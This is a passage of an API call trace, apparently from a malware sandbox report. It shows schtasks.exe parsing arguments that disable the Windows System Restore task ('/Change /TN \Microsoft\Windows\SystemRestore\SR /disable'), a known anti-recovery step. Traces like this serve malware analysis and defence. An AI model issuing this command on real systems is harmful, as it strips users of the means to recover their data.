_Format="Type \"%s /?\" for usage.", _ArgList=0x1b4a07f608 | out: _Buffer="Type \"SCHTASKS /?\" for usage.") returned 29 [0107.567] GetProcessHeap () returned 0x1523d3d0000 [0107.567] GetProcessHeap () returned 0x1523d3d0000 [0107.567] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3e1910) returned 1 [0107.567] GetProcessHeap () returned 0x1523d3d0000 [0107.567] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3e1910) returned 0x766 [0107.568] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3e1910) returned 1 [0107.568] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.568] GetThreadLocale () returned 0x409 [0107.568] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0107.568] lstrlenW (lpString="?") returned 1 [0107.568] GetThreadLocale () returned 0x409 [0107.568] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0107.568] lstrlenW (lpString="create") returned 6 [0107.568] GetThreadLocale () returned 0x409 [0107.568] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0107.568] lstrlenW (lpString="delete") returned 6 [0107.568] GetThreadLocale () returned 0x409 [0107.568] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0107.568] lstrlenW (lpString="query") returned 5 [0107.568] GetThreadLocale () returned 0x409 [0107.568] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0107.568] lstrlenW (lpString="change") returned 6 [0107.568] GetThreadLocale () returned 0x409 [0107.568] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0107.568] lstrlenW (lpString="run") returned 3 [0107.568] GetThreadLocale () returned 0x409 [0107.568] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0107.568] lstrlenW (lpString="end") returned 3 [0107.568] GetThreadLocale () returned 0x409 [0107.568] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0107.568] lstrlenW (lpString="showsid") returned 7 [0107.568] GetThreadLocale () returned 0x409 [0107.568] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0107.568] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.568] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.568] lstrlenW (lpString="/Change") returned 7 [0107.568] lstrlenW (lpString="-/") returned 2 [0107.568] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0107.568] lstrlenW (lpString="?") returned 1 [0107.568] lstrlenW (lpString="?") returned 1 [0107.568] GetProcessHeap () returned 0x1523d3d0000 [0107.568] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x18) returned 0x1523d3df420 [0107.568] _memicmp (_Buf1=0x1523d3df420, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.568] GetProcessHeap () returned 0x1523d3d0000 [0107.568] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0xa) returned 0x1523d3df2c0 [0107.568] lstrlenW (lpString="Change") returned 6 [0107.569] GetProcessHeap () returned 0x1523d3d0000 [0107.569] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x18) returned 0x1523d3df4c0 [0107.569] _memicmp (_Buf1=0x1523d3df4c0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.569] GetProcessHeap () returned 0x1523d3d0000 [0107.569] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x14) returned 0x1523d3df440 [0107.569] _vsnwprintf (in: _Buffer=0x1523d3df2c0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x1b4a07f618 | out: _Buffer="|?|") returned 3 [0107.569] _vsnwprintf (in: _Buffer=0x1523d3df440, _BufferCount=0x9, _Format="|%s|", _ArgList=0x1b4a07f618 | out: _Buffer="|Change|") returned 8 [0107.569] lstrlenW (lpString="|?|") returned 3 [0107.569] lstrlenW (lpString="|Change|") returned 8 [0107.569] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.569] lstrlenW (lpString="create") returned 6 [0107.569] lstrlenW (lpString="create") returned 6 [0107.569] _memicmp (_Buf1=0x1523d3df420, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.569] GetProcessHeap () returned 0x1523d3d0000 [0107.569] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3df2c0) returned 1 [0107.569] GetProcessHeap () returned 0x1523d3d0000 [0107.569] RtlReAllocateHeap (Heap=0x1523d3d0000, Flags=0xc, Ptr=0x1523d3df2c0, Size=0x14) returned 0x1523d3df2e0 [0107.569] lstrlenW (lpString="Change") returned 6 [0107.569] _memicmp (_Buf1=0x1523d3df4c0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.569] _vsnwprintf (in: _Buffer=0x1523d3df2e0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x1b4a07f618 | out: _Buffer="|create|") returned 8 [0107.569] _vsnwprintf (in: _Buffer=0x1523d3df440, _BufferCount=0x9, _Format="|%s|", _ArgList=0x1b4a07f618 | out: _Buffer="|Change|") returned 8 [0107.569] lstrlenW (lpString="|create|") returned 8 [0107.569] lstrlenW (lpString="|Change|") returned 8 [0107.569] StrStrIW (lpFirst="|create|", lpSrch="|Change|") returned 0x0 [0107.569] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.569] lstrlenW (lpString="delete") returned 6 [0107.569] lstrlenW (lpString="delete") returned 6 [0107.569] _memicmp (_Buf1=0x1523d3df420, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.569] lstrlenW (lpString="Change") returned 6 [0107.569] _memicmp (_Buf1=0x1523d3df4c0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.569] _vsnwprintf (in: _Buffer=0x1523d3df2e0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x1b4a07f618 | out: _Buffer="|delete|") returned 8 [0107.569] _vsnwprintf (in: _Buffer=0x1523d3df440, _BufferCount=0x9, _Format="|%s|", _ArgList=0x1b4a07f618 | out: _Buffer="|Change|") returned 8 [0107.569] lstrlenW (lpString="|delete|") returned 8 [0107.569] lstrlenW (lpString="|Change|") returned 8 [0107.569] StrStrIW (lpFirst="|delete|", lpSrch="|Change|") returned 0x0 [0107.569] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.569] lstrlenW (lpString="query") returned 5 [0107.569] lstrlenW (lpString="query") returned 5 [0107.569] _memicmp (_Buf1=0x1523d3df420, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.570] lstrlenW (lpString="Change") returned 6 [0107.570] _memicmp (_Buf1=0x1523d3df4c0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.570] _vsnwprintf (in: _Buffer=0x1523d3df2e0, _BufferCount=0x8, _Format="|%s|", _ArgList=0x1b4a07f618 | out: _Buffer="|query|") returned 7 [0107.570] _vsnwprintf (in: _Buffer=0x1523d3df440, _BufferCount=0x9, _Format="|%s|", _ArgList=0x1b4a07f618 | out: _Buffer="|Change|") returned 8 [0107.570] lstrlenW (lpString="|query|") returned 7 [0107.570] lstrlenW (lpString="|Change|") returned 8 [0107.570] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.570] lstrlenW (lpString="change") returned 6 [0107.570] lstrlenW (lpString="change") returned 6 [0107.570] _memicmp (_Buf1=0x1523d3df420, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.570] lstrlenW (lpString="Change") returned 6 [0107.570] _memicmp (_Buf1=0x1523d3df4c0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.570] _vsnwprintf (in: _Buffer=0x1523d3df2e0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x1b4a07f618 | out: _Buffer="|change|") returned 8 [0107.570] _vsnwprintf (in: _Buffer=0x1523d3df440, _BufferCount=0x9, _Format="|%s|", _ArgList=0x1b4a07f618 | out: _Buffer="|Change|") returned 8 [0107.570] lstrlenW (lpString="|change|") returned 8 [0107.570] lstrlenW (lpString="|Change|") returned 8 [0107.570] StrStrIW (lpFirst="|change|", lpSrch="|Change|") returned="|change|" [0107.570] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.570] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.570] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.570] lstrlenW (lpString="/TN") returned 3 [0107.570] lstrlenW (lpString="-/") returned 2 [0107.570] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0107.570] lstrlenW (lpString="?") returned 1 [0107.570] lstrlenW (lpString="?") returned 1 [0107.570] _memicmp (_Buf1=0x1523d3df420, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.570] lstrlenW (lpString="TN") returned 2 [0107.570] _memicmp (_Buf1=0x1523d3df4c0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.570] _vsnwprintf (in: _Buffer=0x1523d3df2e0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x1b4a07f618 | out: _Buffer="|?|") returned 3 [0107.570] _vsnwprintf (in: _Buffer=0x1523d3df440, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1b4a07f618 | out: _Buffer="|TN|") returned 4 [0107.570] lstrlenW (lpString="|?|") returned 3 [0107.570] lstrlenW (lpString="|TN|") returned 4 [0107.570] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.570] lstrlenW (lpString="create") returned 6 [0107.570] lstrlenW (lpString="create") returned 6 [0107.570] _memicmp (_Buf1=0x1523d3df420, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.570] lstrlenW (lpString="TN") returned 2 [0107.571] _memicmp (_Buf1=0x1523d3df4c0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.571] _vsnwprintf (in: _Buffer=0x1523d3df2e0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x1b4a07f618 | out: _Buffer="|create|") returned 8 [0107.571] _vsnwprintf (in: _Buffer=0x1523d3df440, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1b4a07f618 | out: _Buffer="|TN|") returned 4 [0107.571] lstrlenW (lpString="|create|") returned 8 [0107.571] lstrlenW (lpString="|TN|") returned 4 [0107.571] StrStrIW (lpFirst="|create|", lpSrch="|TN|") returned 0x0 [0107.571] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.571] lstrlenW (lpString="delete") returned 6 [0107.571] lstrlenW (lpString="delete") returned 6 [0107.571] _memicmp (_Buf1=0x1523d3df420, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.571] lstrlenW (lpString="TN") returned 2 [0107.571] _memicmp (_Buf1=0x1523d3df4c0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.571] _vsnwprintf (in: _Buffer=0x1523d3df2e0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x1b4a07f618 | out: _Buffer="|delete|") returned 8 [0107.571] _vsnwprintf (in: _Buffer=0x1523d3df440, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1b4a07f618 | out: _Buffer="|TN|") returned 4 [0107.571] lstrlenW (lpString="|delete|") returned 8 [0107.571] lstrlenW (lpString="|TN|") returned 4 [0107.571] StrStrIW (lpFirst="|delete|", lpSrch="|TN|") returned 0x0 [0107.571] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.571] lstrlenW (lpString="query") returned 5 [0107.571] lstrlenW (lpString="query") returned 5 [0107.571] _memicmp (_Buf1=0x1523d3df420, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.571] lstrlenW (lpString="TN") returned 2 [0107.571] _memicmp (_Buf1=0x1523d3df4c0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.571] _vsnwprintf (in: _Buffer=0x1523d3df2e0, _BufferCount=0x8, _Format="|%s|", _ArgList=0x1b4a07f618 | out: _Buffer="|query|") returned 7 [0107.571] _vsnwprintf (in: _Buffer=0x1523d3df440, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1b4a07f618 | out: _Buffer="|TN|") returned 4 [0107.571] lstrlenW (lpString="|query|") returned 7 [0107.571] lstrlenW (lpString="|TN|") returned 4 [0107.571] StrStrIW (lpFirst="|query|", lpSrch="|TN|") returned 0x0 [0107.571] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.571] lstrlenW (lpString="change") returned 6 [0107.571] lstrlenW (lpString="change") returned 6 [0107.571] _memicmp (_Buf1=0x1523d3df420, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.571] lstrlenW (lpString="TN") returned 2 [0107.571] _memicmp (_Buf1=0x1523d3df4c0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.571] _vsnwprintf (in: _Buffer=0x1523d3df2e0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x1b4a07f618 | out: _Buffer="|change|") returned 8 [0107.571] _vsnwprintf (in: _Buffer=0x1523d3df440, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1b4a07f618 | out: _Buffer="|TN|") returned 4 [0107.571] lstrlenW (lpString="|change|") returned 8 [0107.572] lstrlenW (lpString="|TN|") returned 4 [0107.572] StrStrIW (lpFirst="|change|", lpSrch="|TN|") returned 0x0 [0107.572] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.572] lstrlenW (lpString="run") returned 3 [0107.572] lstrlenW (lpString="run") returned 3 [0107.572] _memicmp (_Buf1=0x1523d3df420, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.572] lstrlenW (lpString="TN") returned 2 [0107.572] _memicmp (_Buf1=0x1523d3df4c0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.572] _vsnwprintf (in: _Buffer=0x1523d3df2e0, _BufferCount=0x6, _Format="|%s|", _ArgList=0x1b4a07f618 | out: _Buffer="|run|") returned 5 [0107.572] _vsnwprintf (in: _Buffer=0x1523d3df440, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1b4a07f618 | out: _Buffer="|TN|") returned 4 [0107.572] lstrlenW (lpString="|run|") returned 5 [0107.572] lstrlenW (lpString="|TN|") returned 4 [0107.572] StrStrIW (lpFirst="|run|", lpSrch="|TN|") returned 0x0 [0107.572] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.573] lstrlenW (lpString="end") returned 3 [0107.573] lstrlenW (lpString="end") returned 3 [0107.573] _memicmp (_Buf1=0x1523d3df420, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.573] lstrlenW (lpString="TN") returned 2 [0107.573] _memicmp (_Buf1=0x1523d3df4c0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.573] _vsnwprintf (in: _Buffer=0x1523d3df2e0, _BufferCount=0x6, _Format="|%s|", _ArgList=0x1b4a07f618 | out: _Buffer="|end|") returned 5 [0107.573] _vsnwprintf (in: _Buffer=0x1523d3df440, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1b4a07f618 | out: _Buffer="|TN|") returned 4 [0107.573] lstrlenW (lpString="|end|") returned 5 [0107.573] lstrlenW (lpString="|TN|") returned 4 [0107.573] StrStrIW (lpFirst="|end|", lpSrch="|TN|") returned 0x0 [0107.573] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.573] lstrlenW (lpString="showsid") returned 7 [0107.573] lstrlenW (lpString="showsid") returned 7 [0107.573] _memicmp (_Buf1=0x1523d3df420, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.573] GetProcessHeap () returned 0x1523d3d0000 [0107.573] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3df2e0) returned 1 [0107.573] GetProcessHeap () returned 0x1523d3d0000 [0107.573] RtlReAllocateHeap (Heap=0x1523d3d0000, Flags=0xc, Ptr=0x1523d3df2e0, Size=0x16) returned 0x1523d3df5e0 [0107.573] lstrlenW (lpString="TN") returned 2 [0107.573] _memicmp (_Buf1=0x1523d3df4c0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.573] _vsnwprintf (in: _Buffer=0x1523d3df5e0, _BufferCount=0xa, _Format="|%s|", _ArgList=0x1b4a07f618 | out: _Buffer="|showsid|") returned 9 [0107.573] _vsnwprintf (in: _Buffer=0x1523d3df440, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1b4a07f618 | out: _Buffer="|TN|") returned 4 [0107.573] lstrlenW (lpString="|showsid|") returned 9 [0107.573] lstrlenW (lpString="|TN|") returned 4 [0107.573] StrStrIW (lpFirst="|showsid|", lpSrch="|TN|") returned 0x0 [0107.573] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.574] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.574] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.574] lstrlenW (lpString="/TN") returned 3 [0107.574] StrChrIW (lpStart="/TN", wMatch=0x3a) returned 0x0 [0107.574] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.574] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.574] lstrlenW (lpString="/TN") returned 3 [0107.574] GetProcessHeap () returned 0x1523d3d0000 [0107.574] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x8) returned 0x1523d3ddb60 [0107.574] GetProcessHeap () returned 0x1523d3d0000 [0107.574] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x20) returned 0x1523d3dfcb0 [0107.574] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.574] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.574] lstrlenW (lpString="\\Microsoft\\Windows\\SystemRestore\\SR") returned 35 [0107.574] lstrlenW (lpString="-/") returned 2 [0107.574] StrChrIW (lpStart="-/", wMatch=0x5c) returned 0x0 [0107.574] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.574] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.574] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.574] lstrlenW (lpString="\\Microsoft\\Windows\\SystemRestore\\SR") returned 35 [0107.574] StrChrIW (lpStart="\\Microsoft\\Windows\\SystemRestore\\SR", wMatch=0x3a) returned 0x0 [0107.574] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.574] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.574] lstrlenW (lpString="\\Microsoft\\Windows\\SystemRestore\\SR") returned 35 [0107.574] GetProcessHeap () returned 0x1523d3d0000 [0107.574] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x48) returned 0x1523d3dcf10 [0107.574] GetProcessHeap () returned 0x1523d3d0000 [0107.574] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x20) returned 0x1523d3e0130 [0107.574] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.574] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.574] lstrlenW (lpString="/disable") returned 8 [0107.574] lstrlenW (lpString="-/") returned 2 [0107.574] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0107.574] lstrlenW (lpString="?") returned 1 [0107.574] lstrlenW (lpString="?") returned 1 [0107.574] _memicmp (_Buf1=0x1523d3df420, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.574] lstrlenW (lpString="disable") returned 7 [0107.574] _memicmp (_Buf1=0x1523d3df4c0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.574] GetProcessHeap () returned 0x1523d3d0000 [0107.575] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3df440) returned 1 [0107.575] GetProcessHeap () returned 0x1523d3d0000 [0107.575] RtlReAllocateHeap (Heap=0x1523d3d0000, Flags=0xc, Ptr=0x1523d3df440, Size=0x16) returned 0x1523d3df240 [0107.575] _vsnwprintf (in: _Buffer=0x1523d3df5e0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x1b4a07f618 | out: _Buffer="|?|") returned 3 [0107.575] _vsnwprintf (in: _Buffer=0x1523d3df240, _BufferCount=0xa, _Format="|%s|", _ArgList=0x1b4a07f618 | out: _Buffer="|disable|") returned 9 [0107.575] lstrlenW (lpString="|?|") returned 3 [0107.575] lstrlenW (lpString="|disable|") returned 9 [0107.575] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.575] lstrlenW (lpString="create") returned 6 [0107.575] lstrlenW (lpString="create") returned 6 [0107.575] _memicmp (_Buf1=0x1523d3df420, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.575] lstrlenW (lpString="disable") returned 7 [0107.575] _memicmp (_Buf1=0x1523d3df4c0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.575] _vsnwprintf (in: _Buffer=0x1523d3df5e0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x1b4a07f618 | out: _Buffer="|create|") returned 8 [0107.575] _vsnwprintf (in: _Buffer=0x1523d3df240, _BufferCount=0xa, _Format="|%s|", _ArgList=0x1b4a07f618 | out: _Buffer="|disable|") returned 9 [0107.575] lstrlenW (lpString="|create|") returned 8 [0107.575] lstrlenW (lpString="|disable|") returned 9 [0107.575] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.575] lstrlenW (lpString="delete") returned 6 [0107.575] lstrlenW (lpString="delete") returned 6 [0107.575] _memicmp (_Buf1=0x1523d3df420, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.575] lstrlenW (lpString="disable") returned 7 [0107.575] _memicmp (_Buf1=0x1523d3df4c0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.576] _vsnwprintf (in: _Buffer=0x1523d3df5e0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x1b4a07f618 | out: _Buffer="|delete|") returned 8 [0107.576] _vsnwprintf (in: _Buffer=0x1523d3df240, _BufferCount=0xa, _Format="|%s|", _ArgList=0x1b4a07f618 | out: _Buffer="|disable|") returned 9 [0107.576] lstrlenW (lpString="|delete|") returned 8 [0107.576] lstrlenW (lpString="|disable|") returned 9 [0107.576] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.576] lstrlenW (lpString="query") returned 5 [0107.576] lstrlenW (lpString="query") returned 5 [0107.576] _memicmp (_Buf1=0x1523d3df420, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.576] lstrlenW (lpString="disable") returned 7 [0107.576] _memicmp (_Buf1=0x1523d3df4c0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.576] _vsnwprintf (in: _Buffer=0x1523d3df5e0, _BufferCount=0x8, _Format="|%s|", _ArgList=0x1b4a07f618 | out: _Buffer="|query|") returned 7 [0107.576] _vsnwprintf (in: _Buffer=0x1523d3df240, _BufferCount=0xa, _Format="|%s|", _ArgList=0x1b4a07f618 | out: _Buffer="|disable|") returned 9 [0107.576] lstrlenW (lpString="|query|") returned 7 [0107.576] lstrlenW (lpString="|disable|") returned 9 [0107.576] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.576] lstrlenW (lpString="change") returned 6 [0107.576] lstrlenW (lpString="change") returned 6 [0107.576] _memicmp (_Buf1=0x1523d3df420, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.576] lstrlenW (lpString="disable") returned 7 [0107.576] _memicmp (_Buf1=0x1523d3df4c0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.576] _vsnwprintf (in: _Buffer=0x1523d3df5e0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x1b4a07f618 | out: _Buffer="|change|") returned 8 [0107.576] _vsnwprintf (in: _Buffer=0x1523d3df240, _BufferCount=0xa, _Format="|%s|", _ArgList=0x1b4a07f618 | out: _Buffer="|disable|") returned 9 [0107.576] lstrlenW (lpString="|change|") returned 8 [0107.576] lstrlenW (lpString="|disable|") returned 9 [0107.576] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.576] lstrlenW (lpString="run") returned 3 [0107.576] lstrlenW (lpString="run") returned 3 [0107.576] _memicmp (_Buf1=0x1523d3df420, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.576] lstrlenW (lpString="disable") returned 7 [0107.576] _memicmp (_Buf1=0x1523d3df4c0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.576] _vsnwprintf (in: _Buffer=0x1523d3df5e0, _BufferCount=0x6, _Format="|%s|", _ArgList=0x1b4a07f618 | out: _Buffer="|run|") returned 5 [0107.576] _vsnwprintf (in: _Buffer=0x1523d3df240, _BufferCount=0xa, _Format="|%s|", _ArgList=0x1b4a07f618 | out: _Buffer="|disable|") returned 9 [0107.576] lstrlenW (lpString="|run|") returned 5 [0107.577] lstrlenW (lpString="|disable|") returned 9 [0107.577] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.577] lstrlenW (lpString="end") returned 3 [0107.577] lstrlenW (lpString="end") returned 3 [0107.577] _memicmp (_Buf1=0x1523d3df420, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.577] lstrlenW (lpString="disable") returned 7 [0107.577] _memicmp (_Buf1=0x1523d3df4c0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.577] _vsnwprintf (in: _Buffer=0x1523d3df5e0, _BufferCount=0x6, _Format="|%s|", _ArgList=0x1b4a07f618 | out: _Buffer="|end|") returned 5 [0107.577] _vsnwprintf (in: _Buffer=0x1523d3df240, _BufferCount=0xa, _Format="|%s|", _ArgList=0x1b4a07f618 | out: _Buffer="|disable|") returned 9 [0107.577] lstrlenW (lpString="|end|") returned 5 [0107.577] lstrlenW (lpString="|disable|") returned 9 [0107.577] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.577] lstrlenW (lpString="showsid") returned 7 [0107.577] lstrlenW (lpString="showsid") returned 7 [0107.577] _memicmp (_Buf1=0x1523d3df420, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.577] lstrlenW (lpString="disable") returned 7 [0107.577] _memicmp (_Buf1=0x1523d3df4c0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.577] _vsnwprintf (in: _Buffer=0x1523d3df5e0, _BufferCount=0xa, _Format="|%s|", _ArgList=0x1b4a07f618 | out: _Buffer="|showsid|") returned 9 [0107.577] _vsnwprintf (in: _Buffer=0x1523d3df240, _BufferCount=0xa, _Format="|%s|", _ArgList=0x1b4a07f618 | out: _Buffer="|disable|") returned 9 [0107.577] lstrlenW (lpString="|showsid|") returned 9 [0107.577] lstrlenW (lpString="|disable|") returned 9 [0107.577] StrStrIW (lpFirst="|showsid|", lpSrch="|disable|") returned 0x0 [0107.577] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.577] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.578] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.578] lstrlenW (lpString="/disable") returned 8 [0107.578] StrChrIW (lpStart="/disable", wMatch=0x3a) returned 0x0 [0107.578] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.578] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.578] lstrlenW (lpString="/disable") returned 8 [0107.578] GetProcessHeap () returned 0x1523d3d0000 [0107.578] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x12) returned 0x1523d3df860 [0107.578] GetProcessHeap () returned 0x1523d3d0000 [0107.578] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x20) returned 0x1523d3dfd10 [0107.578] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.578] GetProcessHeap () returned 0x1523d3d0000 [0107.578] GetProcessHeap () returned 0x1523d3d0000 [0107.578] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3ddb60) returned 1 [0107.578] GetProcessHeap () returned 0x1523d3d0000 [0107.578] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3ddb60) returned 0x8 [0107.578] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3ddb60) returned 1 [0107.578] GetProcessHeap () returned 0x1523d3d0000 [0107.578] GetProcessHeap () returned 0x1523d3d0000 [0107.578] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3dfcb0) returned 1 [0107.578] GetProcessHeap () returned 0x1523d3d0000 [0107.578] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3dfcb0) returned 0x20 [0107.578] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3dfcb0) returned 1 [0107.578] GetProcessHeap () returned 0x1523d3d0000 [0107.578] GetProcessHeap () returned 0x1523d3d0000 [0107.578] HeapValidate (hHeap=0x1523d3d0000, 